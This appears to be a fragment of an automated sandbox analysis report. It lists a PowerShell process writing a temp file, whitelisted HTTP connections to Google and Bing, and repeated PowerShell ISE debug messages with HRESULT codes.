3460 | PoWersheLl.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\H3PB3QUVWAVJ9PETYRTH.temp | — | |
MD5:— | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3600 | iexplore.exe | GET | 302 | 172.217.23.164:80 | http://www.google.com/ | US | html | 231 b | whitelisted |
3856 | iexplore.exe | GET | 200 | 204.79.197.200:80 | http://www.bing.com/favicon.ico | US | image | 237 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3856 | iexplore.exe | 204.79.197.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
3600 | iexplore.exe | 172.217.23.164:80 | www.google.com | Google Inc. | US | whitelisted |
3600 | iexplore.exe | 172.217.23.164:443 | www.google.com | Google Inc. | US | whitelisted |
3856 | iexplore.exe | 172.217.23.164:443 | www.google.com | Google Inc. | US | whitelisted |
Domain | IP | Reputation |
---|---|---|
www.google.com |
| whitelisted |
www.bing.com |
| whitelisted |
Process | Message |
---|---|
PowerShell_ISE.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
PowerShell_ISE.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
PowerShell_ISE.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
PowerShell_ISE.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
PowerShell_ISE.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
PowerShell_ISE.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
PowerShell_ISE.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
PowerShell_ISE.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
PowerShell_ISE.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
PowerShell_ISE.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|